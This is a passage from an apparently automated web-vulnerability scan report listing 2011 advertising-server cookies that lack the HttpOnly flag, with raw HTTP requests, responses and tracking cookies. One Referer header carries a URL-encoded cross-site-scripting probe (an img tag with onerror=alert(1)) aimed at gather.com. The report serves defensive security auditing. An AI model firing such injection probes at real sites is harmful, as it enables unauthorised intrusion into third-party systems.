Y!!!!#=1>Dd!#v-$!!!!#=09!!!#wW9!!!!$=2Z2#!#x?H~~!#xUN!!!!%=3]pn!#yM#!!!!$=2Z2#!$#4B!!!!%=5?_.!$#R7!!!!#=3]pn!$#WA!!!!$=2Z2#!$$F#!!!!#=/bCH!$%'+!!!!%=3uq>!$%,!!!!!$=2Z2#!$%SB!!!!$=2Z2#!$'/Y!!!!#=09!!!$(!(!!!!.=5?_.!$(!P!!!!+=5?_.!$(Gt!!!!#=3]pn!$)gA!!!!#=09!!!$*NG!!!!#=3_$G!$*ZH!!!!#=43u.!$*a0!!!!$=2Z2#!$+M>!!!!#=3M3D!$,0h!!!!$=2Z2#!$,5d!!!!#=3Elr!$,jw!!!!#=2w#K!$-%:!!!!%=5?_.!$-(b!!!!#=3]pn!$.#F!!!!#=3i%Z!$.`:!!!!==4(vN!$0Ge!!!!$=3M3H!$0VL!!!!'=5?_.!$0VM!!!!'=5?_.!$1]+~~!$1g/!!!!%=1D5F!$2j$!!!!$=2Z2#!$3IO!!!!+=5?_.!$3y-!!!!(=2w%w!$4ou!!!!$=2Z2#!$5)A!!!!#=09!!!$5Rt!!!!#=1>Dd!$5Ru!!!!#=2w#K!$8+W!!!!'=5?_.!$8>S!!!!'=3H<B!$8Js!!!!#=/(P2!$8Ju!!!!#=/(P2!$:3.!!!!#=2w#K!$<DI!!!!+=5?_.!$=X=!!!!#=3H<6!$=p7!!!!#=2Z2#!$=p8!!!!#=2Z2#!$=s9!!!!#=3+WO!$>#M!!!!#=2Z2#!$>#N!!!!#=2Z2#!$>_#!!!!#=2Z2#!$?=*!!!!#=3Elr!$?i5!!!!%=3v*<!$?tC!!!!$=5?_."; ih="b!!!!)!->h]!!!!$=3]pm!.`.U!!!!#=3H<:!0eUs!!!!#=1F/L!34fN!!!!#=/b4V!34fX!!!!#=/b4X!3DVF!!!!#=1F/N"; BX=8d7n6ot73ufk2&b=4&s=8m&t=219; pv1="b!!!!#!$'!L!$5*F!$kY3!3DVF!%JP7!!!!$!?5%!'2po7!?Q8(!'RQt~~~~~~~=1F/N=3CT*!!!(["; uid=uid=1071eb2c-d4cd-11e0-892f-78e7d1f5079e&_hmacv=1&_salt=321185080&_keyid=k1&_hmac=d75501ec81bb906d515b301e794922b4d10045fa

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:54:31 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!$f!!!?H!!!!$=1j[w!!*l]!!!!#=.lv=!!+^.!!!!#=3Elr!!-?2!!!!.=5?_.!!-C,!!!!%=3v*<!!.uv!!!!#=3Elr!!/pp!!!!#=3Elr!!0O4!!!!#=5@gl!!0O<!!!!$=5@gl!!1CB!!!!#=3_$E!!1SP!!!!#=38n,!!3O?!!!!%=3v*<!!<Os!!!!#=5@fB!!?VS!!DPb=5@bg!!UHs!!!!#=0>(p!!X41!!!!#=0>(p!!Zwa!!!!.=5?_.!!g]C!!!!#=3Elr!!itb!!!!(=5@gl!!nAq!!!!#=3Elr!!pf4!!!!%=3v*<!!srh!!!!$=3i%'!!ssA!!!!#=5@gl!!t4W!!!!#=5@gl!!tP)!!!!#=5@gl!!t^G!!!!$=4'_`!!u*$!!!!)=4Qg^!!ucq!!!!$=5@gl!!v'l!!!!#=3Elr!!vRm!!!!%=5@gl!!vRn!!!!$=5@gl!!vRq!!!!'=5@gl!!vRr!!!!'=5@gl!!vRv!!!!$=5@gl!!vRw!!!!)=5@gl!!vRx!!!!'=5@gl!!vRy!!!!'=5@gl!!va'!!!!#=3Elr!!y!r!!!!$=5@gl!!y!v!!!!$=5@gl!#!,g!!!!)=5@gl!#!y?!!!!#=.lv=!#%v(!!!!#=2w#K!#.dO!!!!$=2Z2#!#.g1!!!!#=.e%I!#.mL!!!!$=0bvK!#/t]!!!!$=09of!#0Kr!!!!$=3M3E!#0L2!!!!%=1Cp-!#0fU!!!!%=5@gl!#0fW!!!!%=5@gl!#2A_!!!!%=5@gl!#2Ac!!!!#=5@gl!#2Ad!!!!$=5@gl!#2Gj!!!!%=3v*<!#2Oe!!!!#=1j[w!#2Of!!!!#=1j[w!#2XY!!!!$=5@gl!#3,2!!!!#=3eKS!#3LI!!!!#=3eKS!#4-m!!!!$=4'_a!#44f!!!!'=5@gl!#44h!!!!'=5@gl!#5nZ!!!!$=5@gl!#7(x!!!!(=5?_.!#7)a!!!!'=5?_.!#7.%!!!!#=5@gl!#7.'!!!!#=5@gl!#:@G!!!!%=3fAI!#<v4!!!!%=5@o)!#?dj!!!!$=3i%,!#?dk!!!!$=3i%,!#?gj!!!!#=4Qfv!#C,X!!!!#=3Elr!#CBJ!!!!#=5@gl!#CB[!!!!#=5@gl!#CB`!!!!#=5@gl!#CBd!!!!#=5@gl!#Dri!!!!#=3i%C!#M7R!!!!#=09!!!#M7S!!!!#=1>Dd!#MTC!!!!'=5@gl!#MTH!!!!'=5@gl!#MTI!!!!'=5@gl!#MTJ!!!!'=5@gl!#N[7!!!!#=2w#K!#N[8!!!!#=09!!!#O9C!!!!#=3i%,!#O9g!!!!#=3i%,!#Ps:!!!!#=2[IV!#Q*T!!!!$=2Z2#!#Q,i!!!!#=2Z2#!#ROs!!!!#=3Elr!#SCj!!!!$=2Z2#!#SCk!!!!$=2Z2#!#Sw^!!!!#=/(P2!#TnE!!!!$=5@gl!#U5q!!!!#=09!!!#UDP!!!!'=5@gl!#YCf!!!!#=2w#K!#Ym:!!!!#=1,!r!#Ym>!!!!#=1,!r!#YmN!!!!#=4Kqg!#Ymj!!!!#=4Kqg!#Ymr!!!!#=4Kqg!#Ymw!!!!#=4Kqg!#Z8E!!!!+=5?_.!#Zgs!!!!'=5?_.!#ZhT!!!!(=5?_.!#[R[!!!!'=5@gl!#],3!!!!#=5@gl!#],7!!!!#=5@gl!#],9!!!!#=5@gl!#],:!!!!#=5@gl!#],?!!!!#=5@gl!#],@!!!!#=5@gl!#],A!!!!#=5@gl!#]BL!!!!#=5@gl!#]BM!!!!#=5@gl!#aG>!!!!$=2Z2#!#aP0!!!!'=/<(G!#agx!!!!#=5@gl!#ah!!!!!#=5@gl!#ah.!!!!#=5@gl!#ai7!!!!#=5@gl!#ai9!!!!#=5@gl!#ai?!!!!#=5@gl!#ai@!!!!#=5@gl!#bGa!!!!#=09!!!#bGi!!!!#=09!!!#bw^!!!!+=5?_.!#cA.!!!!$=5@o)!#cB!!!!!%=5@o)!#cB(!!!!%=5@o)!#cmF!!!!%=5@o)!#cmJ!!!!$=5@o)!#cmM!!!!%=5@o)!#dCX!!!!%=3Stu!#eAL!!!!#=4X3`!#eCK!!!!#=4X3`!#fBj!!!!+=5?_.!#fBk!!!!+=5?_.!#fBm!!!!+=5?_.!#fBn!!!!+=5?_.!#fG+!!!!'=5?_.!#fvy!!!!)=5@go!#g<y!!!!'=5?_.!#nb^!!!!#=3M3D!#rj7!!!!$=5@o)!#s`9!!!!$=5@o)!#s`D!!!!$=5@o)!#sa7!!!!$=5@o)!#sak!!!!$=5@o)!#sar!!!!$=5@o)!#sg@!!!!$=5@o)!#sgE!!!!$=5@o)!#sxJ!!!!#=4Qfv!#t>.!!!!#=1,!r!#tLr!!!!%=5@o)!#tLy!!!!#=5@gl!#tM)!!!!$=5@gl!#tn2!!!!'=5@gl!#trp!!!!.=5?_.!#uQD!!!!#=3_$E!#uQG!!!!#=3_$E!#ust!!!!$=2Z2#!#usu!!!!$=2Z2#!#uw*!!!!'=5@gl!#v,W!!!!#=09!!!#v,Y!!!!#=1>Dd!#v-$!!!!#=09!!!#v<@!!!!#=5@gl!#wW9!!!!$=2Z2#!#xUN!!!!'=5@gl!#yM#!!!!$=2Z2#!$#4B!!!!%=5?_.!$#R7!!!!$=5@gl!$#WA!!!!$=2Z2#!$$F#!!!!#=/bCH!$%'+!!!!%=3uq>!$%,!!!!!$=2Z2#!$%SB!!!!$=2Z2#!$'/Y!!!!#=09!!!$(!(!!!!.=5?_.!$(!P!!!!+=5?_.!$(Gt!!!!$=5@gl!$)gA!!!!#=09!!!$*9h!!!!#=5@fB!$*NG!!!!#=3_$G!$*ZH!!!!#=43u.!$*a0!!!!$=2Z2#!$+.h!!!!#=5@bk!$+M>!!!!#=3M3D!$,0h!!!!$=2Z2#!$,5d!!!!#=3Elr!$,jw!!!!#=2w#K!$,jx!!!!#=5@fB!$-%:!!!!%=5?_.!$-(b!!!!$=5@gl!$-(d!!!!#=5@gl!$-k]!!!!#=5@fB!$.#F!!!!#=3i%Z!$.`:!!!!==4(vN!$0Ge!!!!$=3M3H!$0VL!!!!'=5?_.!$0VM!!!!'=5?_.!$1g/!!!!%=1D5F!$2j$!!!!$=2Z2#!$3IO!!!!+=5?_.!$3y-!!!!(=2w%w!$4ou!!!!$=2Z2#!$5)A!!!!#=09!!!$5Rt!!!!#=1>Dd!$5Ru!!!!#=2w#K!$5u,!!!!#=5@fB!$8+W!!!!'=5?_.!$8>S!!!!'=3H<B!$8Js!!!!#=/(P2!$8Ju!!!!#=/(P2!$:3.!!!!#=2w#K!$<DI!!!!+=5?_.!$=X=!!!!#=3H<6!$=p7!!!!#=2Z2#!$=p8!!!!#=2Z2#!$=s9!!!!#=3+WO!$>#M!!!!#=2Z2#!$>#N!!!!#=2Z2#!$>_#!!!!#=2Z2#!$?=*!!!!#=3Elr!$?i5!!!!%=3v*<!$?tC!!!!$=5?_.!$AKn!!!!#=5@fB!$AMm!!!!#=5@fB!$Ak+!!!!#=5@go!$Ak3!!!!#=5@go"; path=/; expires=Mon, 16-Sep-2013 16:54:31 GMT
Set-Cookie: BX=8d7n6ot73ufk2&b=4&s=8m&t=219; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Sat, 17 Sep 2011 16:54:31 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;
13.62. http://admonkey.dapper.net/PixelMonkey  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admonkey.dapper.net
Path:   /PixelMonkey

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PixelMonkey?optout=set&nai=1&nocache=5.945939E-02 HTTP/1.1
Host: admonkey.dapper.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.64
Date: Sat, 17 Sep 2011 16:48:17 GMT
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Expires: Sat, 26 Jul 2007 05:00:00 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
Set-Cookie: DAPPEROPTOUT2=OPT-OUT; Domain=.admonkey.dapper.net; Expires=Tue, 14-Sep-2021 16:48:18 GMT
Location: /PixelMonkey?optout=validate&nai=1&nocache=0.9411340234341619
Content-Length: 0

13.63. http://ads.adbrite.com/adserver/vdi/762701  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/762701?d=439524AE9E11374EB2C0C71740C604 HTTP/1.1
Host: ads.adbrite.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: Apache="168296556x0.184+1312290886x-1235322650"; ut="1%3AHczdEkAgEEDhd9nrLsRoGm8TyhC1QjGtd%2Fdze%2BabkyGW0GSw%2Bko%2B9Bs0ELwoIvEkpZmIU8EQ990Tj0bg8Ieg17kmfnq1WiqpOhi66TIv6dAuHwEGrXJOh%2FFfwn0%2F"; rb2=EAE; vsd=0@2@4e737a2c@www.drugstore.com

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 17 Sep 2011 17:05:14 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: ut=; path=/; domain=.adbrite.com; expires=Sat, 17-Sep-2011 17:05:14 GMT
Set-Cookie: rb2=; path=/; domain=.adbrite.com; expires=Sat, 17-Sep-2011 17:05:14 GMT
Set-Cookie: srh=; path=/; domain=.adbrite.com; expires=Sat, 17-Sep-2011 17:05:14 GMT
Set-Cookie: b="deleted%3A%3Adeleted"; path=/; domain=.adbrite.com; expires=Sun, 16-Sep-2012 17:05:14 GMT
Set-Cookie: vsd=0@3@4e74d34a@www.gather.com; path=/; domain=.adbrite.com; expires=Mon, 19-Sep-2011 17:05:14 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
13.64. http://ads.amgdgt.com/ads/opt-out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.amgdgt.com
Path:   /ads/opt-out

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/opt-out?op=set&src=NAI&j=&nocache=9.150338E-02 HTTP/1.1
Host: ads.amgdgt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: ID=AAAAAQAUHqYBDWyeyqBqE.cF1jqOLbPjn1oAAA1YFsfiLUo6rk5pJNfdIYQAAAExm.TKgQ--; UA=AAAAAQAUeT0Tz4iljYcD9iEnCYmYapQqgBYDA3gBY2BgYGZgemDIwLrMloGRv5KB4VQyAwODMAMDo5G1Nv8nBqYv0Qysbr.R5ETAclpByxmYTp1lYO1zZGB0V2VguJcH1AeSM5z95FQjkA0GfimCDAzcDAwsGxjlGYFUDiMDEwPDsk5GGSBv42UwteUGWHD5UrCSdR5gauM5RnGgkuZisFx.GBMDIyOQv_wamA90nJbXAwYgG.g8hsdyAg.BciAAAJeiJYQ-; LO=AAAAAQAUotqj15aS_QGuCXhIm1.jywXl56wBAHVzYTt0eDs2MjM7ZGFsbGFzOzc1MjA3O3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjticm9hZGJhbmQ7NTAuMjMuMTIzLjEwNg--

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: OO=OptOut; Domain=.amgdgt.com; Expires=Tue, 14-Sep-2021 16:48:14 GMT; Path=/
Set-Cookie: UA=""; Domain=.amgdgt.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ID=""; Domain=.amgdgt.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: LO=""; Domain=.amgdgt.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://ads.amgdgt.com/ads/opt-out?op=verify_set&src=NAI
Content-Length: 0
Date: Sat, 17 Sep 2011 16:48:14 GMT

13.65. http://ads.undertone.com/aj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /aj

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /aj?&zoneid=16122&cb=86794942500&t=1316277404.862&fv=10&x=715&y=650&sw=1920&sh=1156&cw=1071&ch=4472&loc=http%3A//www.seattlepi.com/&fr=1 HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB26_27703FDE_10878AA%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=802568.8005145639%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UTOPTOUT=OPTOUT; A28X=0; UTLIA=239109.lrd7vd-16996_239096.lqz3aw-13473; _UTLIA[176658]=lrip0k-19956; _UTCBLOCK[28530]=1316011556; UTID=4a03b50017dd46ddaa511cbfbfb29e68

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSDo OUR BUS UNI COM NAV"
Vary: Accept-Encoding
Content-Length: 2845
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:53:55 GMT
Connection: close
Set-Cookie: UTID=ec8bdbcdecfd409eaf895d1620f2031a; expires=Sun, 16-Sep-2012 16:53:55 GMT; path=/
Set-Cookie: _UTLIA[176658]=; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: _UTLIA[237868]=; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: _UTLIA[238424]=; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: _UTLIA[215930]=; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: UTLIA=197330.lq8kxh-16118_230167.lq8kss-14736_238424.lroed6-20677_215930.lqoxxn-13754; expires=Mon, 17-Oct-2011 16:53:55 GMT; path=/
Set-Cookie: UTPROFILES=; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/

document.write("<"+"SCRIPT TYPE=\"text/javascript\" SRC=\"http://link.undertone.com/st?ad_type=ad&ad_size=300x250&entity=334534&site_code=359&section_code=16122\"><"+"/SCRIPT>\n<"+"!-- END TAG --><"+"
...[SNIP]...
13.66. http://ads.undertone.com/l  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /l?bannerid=237868&campaignid=44988&zoneid=16122&UTLIA=1&cb=0a1ce57aabfb43b0b7b1427ef88c14dc&bk=lroe38&id=6k0bcas6jphbzn34fdtkb91ys HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB26_27703FDE_10878AA%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=802568.8005145639%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UTOPTOUT=OPTOUT; A28X=0; UTID=4a03b50017dd46ddaa511cbfbfb29e68; UTLIA=176658.lrip0k-19956_239109.lrd7vd-16996_239096.lqz3aw-13473

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSDo OUR BUS UNI COM NAV"
Vary: Accept-Encoding
Content-Length: 43
Content-Type: image/gif
Date: Sat, 17 Sep 2011 16:53:58 GMT
Connection: close
Set-Cookie: _UTLIA[237868]=lroexy-16122; expires=Mon, 17-Oct-2011 16:53:58 GMT; path=/
Set-Cookie: UTID=ec8bdbcdecfd409eaf895d1620f2031a; expires=Sun, 16-Sep-2012 16:53:58 GMT; path=/

GIF89a.............!.......,...........D..;
13.67. http://ads.undertone.com/l  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /l?bannerid=238424&campaignid=45173&zoneid=20677&UTLIA=1&cb=3a674fda66dc4569a3b10ace496ce7d4&bk=lroed5&id=46grdiic0nxf6mvp8qktnphk6 HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB26_27704D7D_10F5909%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=284706.307342276%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UTOPTOUT=OPTOUT; A28X=0; UTID=4a03b50017dd46ddaa511cbfbfb29e68; UTLIA=176658.lrip0k-19956_237868.lroe39-16122_239109.lrd7vd-16996_239096.lqz3aw-13473

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSDo OUR BUS UNI COM NAV"
Vary: Accept-Encoding
Content-Length: 43
Content-Type: image/gif
Date: Sat, 17 Sep 2011 16:41:30 GMT
Connection: close
Set-Cookie: _UTLIA[238424]=lroed6-20677; expires=Mon, 17-Oct-2011 16:41:30 GMT; path=/
Set-Cookie: UTID=4a03b50017dd46ddaa511cbfbfb29e68; expires=Sun, 16-Sep-2012 16:41:30 GMT; path=/

GIF89a.............!.......,...........D..;
13.68. http://adserver.teracent.net/tase/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/ad?AdBoxType=15&url=googleoffers.dfa.cities&inv=doubleclick&rnd=1316294720636&esc=0&CustomQuery=zipcode%3D75207%26dma%3D102%26eaid%3D244382735%26epid%3D68093638%26esid%3D791901%26ecid%3D43091605%26ebuy%3D5753751%26 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/3125202/PID_1715626_Parent_SkyBridge_Merchant_Dynamic_728x90_noStore.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316265127425_137664789_as3101_vew|308#1316265127233_137611811_as3107_imp|374#1316221548433_135109402_as3106_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1316276794628_138296936_as3100_imp|374#1316276794628_138296936_as3100_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 16:26:34 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:26:34 GMT
Content-Length: 2756

resourceServer=http%3A%2F%2Fpcdn.tcgmsrv.net%2Ftase&eventId=1316276794628_138296936_as3100_imp&responseStatus=0&eventUrl=http%3A%2F%2Fadserver.teracent.net%2Ftase%2Fredir%2F1316276794628_138296936_as3
...[SNIP]...
13.69. http://adserver.teracent.net/tase/redir/1316276657094_138127931_as3105_imp/vew  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/redir/1316276657094_138127931_as3105_imp/vew

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/redir/1316276657094_138127931_as3105_imp/vew?q=H4sIAAAAAAAAAFWQQWoDMQxFryLJsiyD91plkW1JfITSmWZIoBSGyUwxJZOco3fsIaq02XQlnr78hPX1_r3tCkm0tRtOZXt9HdbxttjQFyBIQVJiQY3W-vLkHaKUNKKIbpwQhZRQMWz-Mv7N5E4RImn0Gnf23A2tPCUBJ847G-5yDISZkbM-cmBMWRB21m7HslwP53We1jZ92nh4PAisrKT2UuapLSX6bkjIe5s7x5RRKVF27B1FQRH29ta66brMRTig7G25jMVdPjT6UIiRchC6O86HU2FhEgbrPh4rIfsnKFpf0G90nEtAgIpaQSpSJawxmYv-nasCZQiiBHXsXcO1XTr7AadrkVNtAQAA&act=vew&idx=[0]&rnd=2034739059&no_ack=1&eventType=countOnCreative&eventOn=creative HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/3125202/PID_1715626_Parent_SkyBridge_Merchant_Dynamic_728x90_noStore.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316276657094_138127931_as3105_imp|374#1316276657094_138127931_as3105_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 204 No Content
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1316276804635_138297754_as3100_vew|374#1316276797216_138139088_as3105_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|6b15c0af12675c6512b6afb6#|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 16:26:44 GMT; Path=/tase
Date: Sat, 17 Sep 2011 16:26:44 GMT

13.70. http://adserver.teracent.net/tase/redir/1316277335242_138208257_as3106_imp/vew  previous  next

